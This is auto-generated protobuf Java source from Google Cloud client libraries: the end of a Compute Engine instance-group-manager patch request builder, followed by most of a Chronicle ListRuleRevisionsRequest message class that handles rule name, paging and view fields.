null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case -84847286: { com.google.cloud.compute.v1.PerInstanceConfig m = input.readMessage( com.google.cloud.compute.v1.PerInstanceConfig.parser(), extensionRegistry); if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(m); } else { perInstanceConfigsBuilder_.addMessage(m); } break; } // case -84847286 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_ = java.util.Collections.emptyList(); private void ensurePerInstanceConfigsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = new java.util.ArrayList<com.google.cloud.compute.v1.PerInstanceConfig>( perInstanceConfigs_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> perInstanceConfigsBuilder_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { if (perInstanceConfigsBuilder_ == null) { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } else { return perInstanceConfigsBuilder_.getMessageList(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public int getPerInstanceConfigsCount() { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.size(); } else { return perInstanceConfigsBuilder_.getCount(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessage(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, value); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs(com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addAllPerInstanceConfigs( java.lang.Iterable<? extends com.google.cloud.compute.v1.PerInstanceConfig> values) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, perInstanceConfigs_); onChanged(); } else { perInstanceConfigsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder clearPerInstanceConfigs() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { perInstanceConfigsBuilder_.clear(); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder removePerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.remove(index); onChanged(); } else { perInstanceConfigsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder getPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { if (perInstanceConfigsBuilder_ != null) { return perInstanceConfigsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder() { return getPerInstanceConfigsFieldBuilder() .addBuilder(com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder() .addBuilder(index, com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig.Builder> getPerInstanceConfigsBuilderList() { return getPerInstanceConfigsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsFieldBuilder() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder>( perInstanceConfigs_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); perInstanceConfigs_ = null; } return perInstanceConfigsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) } // @@protoc_insertion_point(class_scope:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) private static final com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq(); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> PARSER = new com.google.protobuf.AbstractParser< RegionInstanceGroupManagerPatchInstanceConfigReq>() { @java.lang.Override public RegionInstanceGroupManagerPatchInstanceConfigReq parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException() .setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,775
java-chronicle/proto-google-cloud-chronicle-v1/src/main/java/com/google/cloud/chronicle/v1/ListRuleRevisionsRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/chronicle/v1/rule.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.chronicle.v1; /** * * * <pre> * Request message for ListRuleRevisions method. * </pre> * * Protobuf type {@code google.cloud.chronicle.v1.ListRuleRevisionsRequest} */ public final class ListRuleRevisionsRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.chronicle.v1.ListRuleRevisionsRequest) ListRuleRevisionsRequestOrBuilder { private static final long serialVersionUID = 0L; // Use ListRuleRevisionsRequest.newBuilder() to construct. private ListRuleRevisionsRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListRuleRevisionsRequest() { name_ = ""; pageToken_ = ""; view_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListRuleRevisionsRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.class, com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int PAGE_SIZE_FIELD_NUMBER = 2; private int pageSize_ = 0; /** * * * <pre> * The maximum number of revisions to return per page. The service may return * fewer than this value. If unspecified, at most 100 revisions will be * returned. The maximum value is 1000; values above 1000 will be coerced to * 1000. * </pre> * * <code>int32 page_size = 2;</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } public static final int PAGE_TOKEN_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object pageToken_ = ""; /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The pageToken. */ @java.lang.Override public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } } /** * * * <pre> * The page token, received from a previous `ListRuleRevisions` call. * Provide this to retrieve the subsequent page. * * When paginating, all other parameters provided to `ListRuleRevisions` * must match the call that provided the page token. * </pre> * * <code>string page_token = 3;</code> * * @return The bytes for pageToken. */ @java.lang.Override public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int VIEW_FIELD_NUMBER = 4; private int view_ = 0; /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The enum numeric value on the wire for view. */ @java.lang.Override public int getViewValue() { return view_; } /** * * * <pre> * The view field indicates the scope of fields to populate for the revision * being returned. If unspecified, defaults to BASIC. * </pre> * * <code>.google.cloud.chronicle.v1.RuleView view = 4;</code> * * @return The view. */ @java.lang.Override public com.google.cloud.chronicle.v1.RuleView getView() { com.google.cloud.chronicle.v1.RuleView result = com.google.cloud.chronicle.v1.RuleView.forNumber(view_); return result == null ? com.google.cloud.chronicle.v1.RuleView.UNRECOGNIZED : result; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (pageSize_ != 0) { output.writeInt32(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, pageToken_); } if (view_ != com.google.cloud.chronicle.v1.RuleView.RULE_VIEW_UNSPECIFIED.getNumber()) { output.writeEnum(4, view_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (pageSize_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, pageToken_); } if (view_ != com.google.cloud.chronicle.v1.RuleView.RULE_VIEW_UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(4, view_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.chronicle.v1.ListRuleRevisionsRequest)) { return super.equals(obj); } com.google.cloud.chronicle.v1.ListRuleRevisionsRequest other = (com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) obj; if (!getName().equals(other.getName())) return false; if (getPageSize() != other.getPageSize()) return false; if (!getPageToken().equals(other.getPageToken())) return false; if (view_ != other.view_) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + PAGE_SIZE_FIELD_NUMBER; hash = (53 * hash) + getPageSize(); hash = (37 * hash) + PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getPageToken().hashCode(); hash = (37 * hash) + VIEW_FIELD_NUMBER; hash = (53 * hash) + view_; hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.chronicle.v1.ListRuleRevisionsRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for ListRuleRevisions method. * </pre> * * Protobuf type {@code google.cloud.chronicle.v1.ListRuleRevisionsRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.chronicle.v1.ListRuleRevisionsRequest) com.google.cloud.chronicle.v1.ListRuleRevisionsRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.class, com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.Builder.class); } // Construct using com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = ""; pageSize_ = 0; pageToken_ = ""; view_ = 0; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.chronicle.v1.RuleProto .internal_static_google_cloud_chronicle_v1_ListRuleRevisionsRequest_descriptor; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest getDefaultInstanceForType() { return com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest build() { com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.chronicle.v1.ListRuleRevisionsRequest buildPartial() { com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result = new com.google.cloud.chronicle.v1.ListRuleRevisionsRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.chronicle.v1.ListRuleRevisionsRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.pageSize_ = pageSize_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.pageToken_ = pageToken_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.view_ = view_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) { return mergeFrom((com.google.cloud.chronicle.v1.ListRuleRevisionsRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.chronicle.v1.ListRuleRevisionsRequest other) { if (other == com.google.cloud.chronicle.v1.ListRuleRevisionsRequest.getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (other.getPageSize() != 0) { setPageSize(other.getPageSize()); } if (!other.getPageToken().isEmpty()) { pageToken_ = other.pageToken_; bitField0_ |= 0x00000004; onChanged(); } if (other.view_ != 0) { setViewValue(other.getViewValue()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 16: { pageSize_ = input.readInt32(); bitField0_ |= 0x00000002; break; } // case 16 case 26: { pageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 case 32: { view_ = input.readEnum(); bitField0_ |= 0x00000008; break; } // case 32 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The name of the rule to list revisions for. * Format: * `projects/{project}/locations/{location}/instances/{instance}/rules/{rule}` * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } 